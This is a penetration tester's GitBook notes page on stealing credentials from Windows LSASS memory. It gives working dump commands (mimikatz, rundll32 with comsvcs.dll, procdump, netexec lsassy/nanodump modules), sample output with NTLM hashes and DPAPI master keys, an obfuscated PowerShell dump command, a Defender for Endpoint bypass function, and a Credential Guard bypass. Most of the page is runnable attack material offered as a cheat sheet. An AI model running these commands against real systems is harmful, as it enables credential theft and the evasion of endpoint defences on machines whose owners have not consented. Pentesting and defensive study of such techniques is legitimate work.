0xSs0rZ
  • Hello World
  • Whoami
  • Pentest
    • Recon
      • Tools
      • Information Gathering
      • OSINT
        • Tools
        • Emails
        • Dark Web Exposure
        • Database Leak - Credential stuffing
        • Code Search (Gitlab / Github)
        • Credentials in git repos
        • GitHub - finding vulnerabilities
        • API Leaks
        • Social Media
        • Credentials in YouTube Videos
        • Metadata and Hidden infos
      • Whois
      • Google Dorks
      • Git Dorks
      • Cloud
      • DNS Subdomain Enumeration
      • Virtual Host
      • Fingerprinting / Crawling
      • Host Discovery
    • Protocols
      • Port Scan
      • IDS IPS AV Evasion
      • Common Ports
      • MindMap
      • DNS (53)
      • FTP (21)
      • IMAP POP3 (110, 143, 993, 995)
      • IPMI (623 UDP)
      • Kerberos (88)
      • LDAP (389)
      • MSSQL (1433)
      • MySQL (3306)
      • NFS (2049, 111)
      • Oracle TNS (1521, 1522-1529, 1748)
      • RDP (3389)
      • R-Services (512,513,514)
      • RSYNC (873)
      • SMB (445, 139) / RPC
      • SMTP (25, 465)
      • SNMP (10161, UDP 161)
      • SQLite
      • SSH (22)
      • WinRM (5985, 5986)
      • WMI (135)
    • Brute force
      • Default Credentials
      • Password lists
      • Username lists
      • Kraken - All-in-One Tool
      • Bypass IP Blocking
      • Hydra - Basics
      • Web login
      • FTP Bruteforce
      • O365 Bruteforce
      • POP3 Bruteforce
      • RDP Bruteforce
      • SMB Bruteforce
      • SMTP Bruteforce
      • SSH Bruteforce
      • WinRM Bruteforce
    • Shells
      • Web Shell
      • Bind and Reverse Shell
      • TTY Upgrade
    • File Transfer
      • Upload
      • Download - Exfiltration
      • Encryption
    • Web attacks
      • Methodology & Academy
      • OWASP Top 10
      • Avoid Aggressive Scanning
      • Web Enumeration
      • Fuzzing
      • Bypass 403 / 401
      • Registration Form
      • Email Verification Bypass
      • Email injections
      • Phone Number Injection
      • Login Forms Attacks
        • Bypass Authentication
        • Login Brute Force
        • Stay Logged In
        • PHP Type Juggling
      • Bypass Captcha
      • OAuth Misconfiguration
      • 2FA / OTP
      • Bypass 302
      • Password Reset
      • SQL Injection
      • NoSQL injection
      • LDAP Injection
      • XSS
      • SSI / ESI Injection
      • CSP Bypass
      • File Inclusion LFI / RFI
      • File Upload Attacks
      • Command Injection
      • Markdown injection
      • XPath Injection
      • HTTP Verb Tampering
      • HTTP Header Exploitation
      • HTTP Request Smuggling
      • Price / Checkout Manipulation Methods
      • Testing Credit Cards
      • Cookies Misconfiguration
      • Basic HTTP Authentification
      • JWT Token
      • IDOR
      • XXE / XSLT
      • SSTI
      • CSTI
      • SSRF
      • CSRF
      • CORS
      • Open Redirection
      • CSPT
      • Relative Path Overwrite, RPO
      • CRLF Injection
      • JSON Attack
      • Prototype Pollution
      • Web Mass Assignment
      • Web Cache
      • Clickjacking
      • Tabnabbing
      • Race Conditons
      • WAF Bypass
      • CMS
      • Django
      • Flask / Werkzeug
      • Tomcat (8080)
      • Tomcat CGI
      • Nginx
      • IIS
      • Exchange / OWA
      • GitLab
      • Jenkins
      • Splunk
      • Elasticsearch
      • PRTG Network Monitor
      • osTicket
      • ColdFusion
      • Nagios
      • Webmin
      • Slack
      • Moodle
      • Jira
      • Magento
      • Prestashop
      • Docker
    • API
      • OWASP API Top 10
      • Checklist
      • API Discovery / Reco
      • Sensitive Data (API Key, JWT token, etc.) Exposed
      • Postman Usage
      • ZAP Scanner
      • Swagger UI
      • REST API
      • Improper Asset Management
      • Email Enumeration
      • Authentication Bruteforce
      • JWT Token
      • Insecure UUID
      • Mass Assignment
      • Server Side Parameter Pollution
      • IDOR
      • JSON Injection
      • GraphQL
      • Tools & Scanners
      • Resources
    • Public Exploit
      • Search for CVE PoC
      • Convert line breaks from DOS to Linux
      • 7 zip
      • Adobe Acrobate Reader
      • Aiohttp
      • Angular
      • AnyDesk
      • Apache Active MQ
      • Apache Camel
      • Apache OFBiz
      • Apache Struts
      • Apache Traffic Control
      • Axis IP Camera
      • Cacti
      • Chamilo elearning
      • Check Point
      • Cisco
      • Citrix
      • Cleo File Transfer
      • CrushFTP
      • CyberPanel
      • D-Link
      • F5 Big-IP
      • Froxlor
      • Fortinet
      • GeoServer
      • Ghostscript
      • Gitea
      • GLPI
      • Gogs
      • Grafana
      • Ivanti
      • Keycloak
      • Laravel
      • Mitel MiCollab
      • MobileIron
      • MOVEit Transfer
      • Navidrome
      • Next.js
      • Node.js
      • Nostromo
      • NVMS 1000
      • OpenNetAdmin
      • Oracle PeopleSoft
      • Oracle Weblogic
      • Palo Alto
      • Pandora
      • PDF.js
      • pfSense
      • PHP
      • phpMyAdmin
      • Prestashop
      • Roundcube
      • rsync
      • Salesforce
      • SolarWinds
      • Splunk
      • Spring Framework
      • SQLPad
      • Squid Proxy
      • SuiteCRM
      • Symfony
      • TeamViewer
      • TP Link
      • VMWare
      • Wazuh
      • Winrar
      • YesWiki
      • Zabbix
      • Zimbra
      • ZoneAlarm AV/Firewall
      • ZoneMinder
    • External Pentest
    • Internal Pentest
      • Tools
      • Methodology & Cheatsheet
      • Basic Windows Commands
      • Network Attacks
      • LLMNR NBT-NS Poisoning
      • ADIDNS Spoofing
      • TimeRoast
      • Users Identification
      • Password Policy
      • Password Spray
      • LDAP Pass Back Attack
      • Reconaissance
        • Bloodhound
        • Enumeration from Windows Host
        • Enumeration from Linux Host
      • Microsoft Office & Outlook
      • Microsoft SharePoint
      • Windows Exploit
      • Print Spooler
      • LOL Bins
      • Security Controls
      • Network Shares
      • RDWA
      • Kerberoast
      • Misconfiguration
      • Pre-Created Computer Accounts
      • Privileged Access
      • ACL
      • Privilege escalation
      • SAM & LSA secrets
      • NTLM Hashes
      • LSASS secrets
      • AD CS
      • DPAPI
      • gMSA
      • Bypass Powershell Execution Policy
      • Disable / Remove AV Defender and Firewall
      • Kerberos Double Hop Problem
      • SCCM
      • AD FS
      • Trustee and Resource Delegation
      • LAPS
      • DCSync
      • NTDS secrets
      • Domain Password Audit Tools
      • Trusts
      • Persistence
      • Tiering
      • Detection
    • Privilege Escalation
      • Find specific file
      • Linux
        • Tools
        • Linux PrivEsc MindMap
        • Basics Commands
        • Basics - EoP Checklist
        • Environment Enum
        • Services & Internals Enum
        • Writable files / directories
        • /etc/passwd & /etc/shadow
        • Credentials Hunting
        • Path Abuse
        • Wildcard Abuse
        • Escaping Restricted Shells
        • SUID/SGID
        • Sudo Rights Abuse
        • Privileged Groups
        • Capabilities
        • Vulnerable Services
        • Cron Job Abuse
        • Kubernetes
        • Logrotate
        • Miscellaneous Techniques
        • Kernel Exploits
        • Shared Libraries
        • Shared Object Hijacking
        • Python Library Hijacking
        • su bruteforce
        • Hardening Linux
      • Windows
        • Tools
        • Cheatsheet
        • Enumeration
        • Credentials Hunting
        • User Privileges
        • Group Privileges
        • User Account control (UAC)
        • Weak Permissions
        • Kernel / Drivers Exploits
        • Vulnerable Services
        • Token Impersonation
        • Exploit CVE
        • DLL Hijacking
        • Citrix Breakout
        • RDWeb Breakout
        • Interacting with Users
        • Pillaging
        • Miscellaneous Techniques
        • Windows Server
        • Windows Desktop Versions
        • Windows Processes
        • MSI Files
        • NTLM elevation of privilege
        • From Local Admin to NT AUTHORITY\SYSTEM
      • Docker Escape / Breakout
    • Post Exploitation
      • Covering Tracks - Linux
      • Pivot, Tunneling and Port Forwarding
      • Lateral Movement
        • Pass the Hash (PtH)
        • Pass the Ticket (PtT) - Windows
        • Pass the Ticket (PtT) - Linux
        • Fileless Lateral Movement
        • DCOM
      • Gather credentials and more
        • Credentials on Host
        • Password managers, Teamviewer, Outlook, etc.
        • Microsoft Teams Cookies
        • Browser cookies
        • Linux post exploitation
        • Screenshots, clipboard
        • IIS Credentials
        • Azure AD / Entra ID
        • MSOL (Microsoft Online Services) account
        • SCOM credentials
        • Cisco phone system
      • Exfiltration
      • Resources
    • Cracking
      • Hashes
      • Files - Encrypted
      • Blurred image, pdf, etc
    • Thick Client Pentest
    • Wifi Pentest
    • Mobile Pentest
    • Configuration Audit
    • Code Analysis
    • Tools
      • Arsenal - Cheatsheet
      • Burp
      • Browser Extensions
      • Evil-WinRM
      • Internal Pentest Tools Pre Compiled
      • Metasploit
      • Mimikatz
      • NetExec - CME
      • PowerView
      • Rubeus
      • SQLMAP
      • Vulnerability Scanners
      • Collaborator, Web Hook, etc.
    • Search Engines
    • Cheatsheets
    • Note Keeping / Reporting / Admin Stuff
  • Cloud
    • Cloud VM
    • Enumeration
    • SSRF / RCE
    • Azure
    • AWS
    • GCP
    • Kubernetes
    • Tools
  • Antivirus Evasion - Defender
    • Mindmap
    • Defender Module for PowerShell
    • Static Analysis
    • Dynamic Analysis
    • AMSI Bypass
    • Process Injection
    • Open-Source Software
    • User Access Control (UAC)
    • AppLocker
    • LOLBAS / LOLDrivers / LOLESXi
    • PowerShell ConstrainedLanguage Mode, CLM
    • VBScript
    • Bypass all Powershell security features (AMSI,CLM)
    • Bypass AV Payload / Shells
    • Find Folder Exclusions
    • Resources
  • EDR BYPASS
    • Approches for Evasion
    • Tools
    • Obfuscation
    • EDR Killer
    • BYOVD
    • Spoof Command Line Arguments
    • Blind Spots
    • Living Off Security Tools / LOTTunels
    • Process Hollowing
    • Process Injection - Reverse Shell
    • Payload Creation
    • Shellcode Loader
    • MalDev
    • Malware Testing Lab
    • Resources
  • Red Team
    • OpSec / Anonymity
    • Initial Access
    • Infrastructure (phishing, C2, redirector)
    • C2
    • EDR / AV Bypass
    • Physical Penetration Testing
    • Resources
  • CTF
    • OSINT
    • Forensic
      • PCAP Analysis - Wireshark
      • DNS
      • Active Directory - GPO
      • Rubber Ducky
      • Memory Analysis
      • Disk Analysis
      • Extract Data / File Carving
      • Metadata
      • BinWalk
      • Audio
      • PNG Images
    • Cryptography
      • Tools
      • GPG
      • RSA
      • ECB / CBC
      • Esoteric Programming Language
      • One Time Pad
      • Baconian Cipher
      • ROT-13 / Caesar
      • Morse Code
      • XOR
      • Substitution
      • Vigenere
    • Steganography
      • Methods
      • Tools
Powered by GitBook
On this page
  • Task Manager Method
  • Mimikatz
  • SafetyKatz
  • BetterSafetyKatz
  • SharpKatz
  • Dumpert (Direct Syscalls and API unhooking)
  • Rundll32.exe & Comsvcs.dll Method
  • Exctract Credentials
  • Netexec - CME - Remotely
  • Procdump
  • TrickDump
  • MultiDump
  • Obfuscated LSASS Dump
  • RustiveDump
  • LsassReflectDumping
  • RtlCreateProcessReflection
  • ShadowDumper
  • MiniDumpDotNet
  • Nanodump
  • POSTDump
  • Powershell - Bypass Defender for Endpoint
  • Lsass-Shtinkering
  • Go-lsass
  • Blindsight
  • AxiomDumper
  • Bypass Credential Guard
  • Resources

Was this helpful?

  1. Pentest
  2. Internal Pentest

LSASS secrets

PreviousNTLM HashesNextAD CS

Last updated 1 month ago

Was this helpful?

Require Domain Admin or Local Admin Privileges on target

Task Manager Method

C:\htb> mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 23196355 (00000000:0161f2c3)
Session           : Interactive from 4
User Name         : DWM-4
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 3/31/2021 3:00:57 PM
SID               : S-1-5-90-0-4
        msv :
        tspkg :
        wdigest :
         * Username : WINLPE-SRV01$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
        ssp :
        credman :

<SNIP> 

Authentication Id : 0 ; 23026942 (00000000:015f5cfe)
Session           : RemoteInteractive from 2
User Name         : jordan
Domain            : WINLPE-SRV01
Logon Server      : WINLPE-SRV01
Logon Time        : 3/31/2021 2:59:52 PM
SID               : S-1-5-21-3769161915-3336846931-3985975925-1000
        msv :
         [00000003] Primary
         * Username : jordan
         * Domain   : WINLPE-SRV01
         * NTLM     : cf3a5525ee9414229e66279623ed5c58
         * SHA1     : 3c7374127c9a60f9e5b28d3a343eb7ac972367b2
        tspkg :
        wdigest :
         * Username : jordan
         * Domain   : WINLPE-SRV01
         * Password : (null)
        kerberos :
         * Username : jordan
         * Domain   : WINLPE-SRV01
         * Password : (null)
        ssp :
        credman :

<SNIP>

Mimikatz

Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

SafetyKatz

SafetyKatz.exe "sekurlsa::ekeys"

BetterSafetyKatz

SharpKatz

SharpKatz.exe --Command ekeys

Dumpert (Direct Syscalls and API unhooking)

rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

Rundll32.exe & Comsvcs.dll Method

tasklist /FI "IMAGENAME eq lsass.exe"
rundll32.exe C:\windows\System32\comsvcs.dll, Minidump <lsass_process_id> C:\Users\Public\lsass.dmp full

LSASS PID in cmd: tasklist /svc

C:\Windows\system32> tasklist /svc

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
Registry                        96 N/A
smss.exe                       344 N/A
csrss.exe                      432 N/A
wininit.exe                    508 N/A
csrss.exe                      520 N/A
winlogon.exe                   580 N/A
services.exe                   652 N/A
lsass.exe                      672 KeyIso, SamSs, VaultSvc
svchost.exe                    776 PlugPlay
svchost.exe                    804 BrokerInfrastructure, DcomLaunch, Power,
                                   SystemEventsBroker
fontdrvhost.exe                812 N/A

LSASS PID in powershell: Get-Process lsass

PS C:\Windows\system32> Get-Process lsass

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   1260      21     4948      15396       2.56    672   0 lsass

LSASS dump:

PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

Transfer dump

Transfer over SMB - as for SAM secrets

Exctract Credentials

$ pypykatz lsa minidump /home/peter/Documents/lsass.dmp 

INFO:root:Parsing file /home/peter/Documents/lsass.dmp
FILE: ======== /home/peter/Documents/lsass.dmp =======
== LogonSession ==
authentication_id 1354633 (14ab89)
session_id 2
username bob
domainname DESKTOP-33E7O54
logon_server WIN-6T0C3J2V6HP
logon_time 2021-12-14T18:14:25.514306+00:00
sid S-1-5-21-4019466498-1700476312-3544718034-1001
luid 1354633
	== MSV ==
		Username: bob
		Domain: DESKTOP-33E7O54
		LM: NA
		NT: 64f12cddaa88057e06a81b54e73b949b
		SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8
		DPAPI: NA
	== WDIGEST [14ab89]==
		username bob
		domainname DESKTOP-33E7O54
		password None
		password (hex)
	== Kerberos ==
		Username: bob
		Domain: DESKTOP-33E7O54
	== WDIGEST [14ab89]==
		username bob
		domainname DESKTOP-33E7O54
		password None
		password (hex)
	== DPAPI [14ab89]==
		luid 1354633
		key_guid 3e1d1091-b792-45df-ab8e-c66af044d69b
		masterkey e8bc2faf77e7bd1891c0e49f0dea9d447a491107ef5b25b9929071f68db5b0d55bf05df5a474d9bd94d98be4b4ddb690e6d8307a86be6f81be0d554f195fba92
		sha1_masterkey 52e758b6120389898f7fae553ac8172b43221605

... SNIP ...

Netexec - CME - Remotely

nxc smb 192.168.255.131 -u administrator -p pass -M lsassy
nxc smb 192.168.255.131 -u administrator -p pass -M nanodump
nxc smb 192.168.255.131 -u administrator -p pass -M mimikatz
nxc smb 192.168.255.131 -u Administrator -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"

SMB Module handlekatz: [*] handlekatz Get lsass dump using handlekatz64 and parse the result with pypykatz

SMB module procdump: [*] procdump Get lsass dump using procdump64 and parse the result with pypykatz

Procdump

C:\htb> procdump.exe -accepteula -ma lsass.exe lsass.dmp

ProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[15:25:45] Dump 1 initiated: C:\Tools\Procdump\lsass.dmp
[15:25:45] Dump 1 writing: Estimated dump file size is 42 MB.
[15:25:45] Dump 1 complete: 43 MB written in 0.5 seconds
[15:25:46] Dump count reached.

TrickDump

MultiDump

Obfuscated LSASS Dump

PS C:> start-job { cd e:; while ($true) { cp dmp.log dmp.log2;}}
PS E:> &$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % {  $_.FullName }), `#-99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999976-decoy $(gps l?a*s).id c:\t??p\dmp.log full; Wait-Process -Id (Get-Process rundll32).id ;
&$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % {
  $_.FullName }), `#-999999999999999999999999999999999999999999999999999999999
  9999999999999999999999999999999999999999999999999999999999999999999999999999
  9999999999999999999999999999999999999999999999999999999999999999999999999999
  999999999999999999999999976-decoy $(gps l?a*s).id dmp.tmp full; Wait-Process
   -Id (Get-Process rundll32).id ; (Get-Item -Path E:\dmp.tmp).Encrypt();

Parse dump

RustiveDump

LsassReflectDumping

RtlCreateProcessReflection

ShadowDumper

MiniDumpDotNet

.\minidumpdotnet.exe <LSASS_PID> <minidump_file>

tasklist /v to enumerate LSASS PID is detected by EDR

FindLSASSPID.cpp

// Find PID of a process by name
int FindPID(const char* procname)
{
	int pid= 0;
	PROCESSENTRY32 proc = {};
	proc.dwSize= sizeof(PROCESSENTRY32);
	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);bool bProc= Process32First(snapshot, &proc);
	while (bProc)
	{
		if (strcmp(procname, proc.szExeFile) == 0)
		{
			pid= proc.th32ProcessID;
			break;
		}
		bProc= Process32Next(snapshot, &proc);
	}
	return pid;
}

Nanodump

POSTDump

Powershell - Bypass Defender for Endpoint 

function Write-MemoryDump {
param(
[string]$outputPath
)

$processId = Get-ProcessId
if (-not $processId) { return $false }

try {
# Open target process
$processHandle = [System.Diagnostics.Process]::GetProcessById($processId).Handle
if (-not $processHandle) {
Write-Host “Failed to open target process with PID: $processId”
return $false
}
Write-Host “Successfully opened target process with PID: $processId”

# Create dump file
$fileStream = [System.IO.File]::Open($outputPath, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write)
$fileHandle = $fileStream.SafeFileHandle.DangerousGetHandle()
Write-Host “Dump file created at $outputPath”

# Write memory dump
$success = [DumpGenerator]::MiniDumpWriteDump(
$processHandle,
[uint32]$processId,
$fileHandle,
[uint32]$FullMemoryDump,
[IntPtr]::Zero,
[IntPtr]::Zero,
[IntPtr]::Zero
)

# Close file stream and release process handle
$fileStream.Close()
[System.Runtime.InteropServices.Marshal]::Release($processHandle)
if ($success) {
Write-Host “Memory dump successfully written to $outputPath”
return $true
} else {
Write-Host “Failed to write memory dump.”
return $false
}
} catch {
Write-Host “An error occurred: $_”
return $false
}
}

Lsass-Shtinkering

Works on Windows 10, Server 2022 - Not working on Server 2019

Go-lsass

Blindsight

AxiomDumper

Bypass Credential Guard

Credential Guard is a virtualization-based isolation technology for LSASS which prevents attackers from stealing credentials that could be used for pass the hash attacks.

NativeBypassCredGuard.exe patch true

Then run your LSASS dump

Resources

See:

Load in Mimikatz and Pass The Hash - See

Pass the Hash (PtH)
Download - Exfiltration
SAM & LSA secrets
https://beta.hackndo.com/remote-lsass-dump-passwords/
Task Manager Method
LogoGitHub - r3motecontrol/Ghostpack-CompiledBinaries: Compiled Binaries for Ghostpack (.NET v4.0)GitHub
LogoGitHub - Flangvik/BetterSafetyKatz: Fork of SafetyKatz that dynamically fetches the latest pre-compiled release of Mimikatz directly from gentilkiwi GitHub repo, runtime patches signatures and uses SharpSploit DInvoke to PE-Load into memory.GitHub
https://github.com/jakobfriedl/precompiled-binaries/raw/main/Credentials/SharpKatz.exe
LogoGitHub - outflanknl/Dumpert: LSASS memory dumper using direct system calls and API unhooking.GitHub
LogoDump LSASS | NetExec
LogoGitHub - ricardojoserf/TrickDump: Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file... and generate the Minidump later!GitHub
LogoGitHub - Xre0uS/MultiDump: MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly.GitHub
LogoGitHub - powerseb/PowerExtractGitHub
LogoObfuscated LSASS dump commandBadOption.eu
LogoGitHub - safedv/RustiveDump: LSASS memory dumper using only NTAPIs, creating a minimal minidump, built in Rust with no_std and independent of the C runtime (CRT). It supports XOR encryption and remote file transmission.GitHub
LogoGitHub - Offensive-Panda/LsassReflectDumping: This tool leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created, it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned processGitHub
LogoGitHub - wolfcod/lsassdump: lsassdump via RtlCreateProcessReflection and NanoDumpGitHub
LogoGitHub - Offensive-Panda/ShadowDumper: Shadow Dumper is a powerful tool used to dump LSASS memory, often needed in penetration testing and red teaming. It uses multiple advanced techniques to dump memory, allowing to access sensitive data in LSASS memory.GitHub
LogoGitHub - WhiteOakSecurity/MiniDumpDotNetGitHub
LogoGitHub - fortra/nanodump: The swiss army knife of LSASS dumpingGitHub
LogoGitHub - YOLOP0wn/POSTDumpGitHub
LogoDefender for Endpoint: Bypassing Lsass Dump with PowerShellCYBERDOM
LogoGitHub - deepinstinct/Lsass-ShtinkeringGitHub
LogoGitHub - jfjallid/go-lsass: Tool to aid in dumping LSASS process remotelyGitHub
LogoGitHub - 0xdea/blindsight: Red teaming tool to dump LSASS memory, bypassing basic countermeasures.GitHub
LogoGitHub - mallo-m/AxiomDumper: Lsass dumper evading (some) EDR detectionGitHub
LogoGitHub - ricardojoserf/NativeBypassCredGuard: Bypass Credential Guard by patching WDigest.dll using only NTAPI functionsGitHub
LogoExtraction des secrets de lsass à distancehackndo
LogoLSASS secrets | The Hacker Recipes
LogoDumping Lsass Without MimikatzRed Teaming Experiments
LogoFantastic Windows Logon types and Where to Find Credentials in ThemAltered Security